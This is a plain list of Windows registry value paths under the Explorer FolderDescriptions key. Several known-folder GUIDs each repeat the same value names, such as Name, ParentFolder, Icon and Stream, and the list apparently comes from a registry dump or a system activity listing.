HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\RelativePath
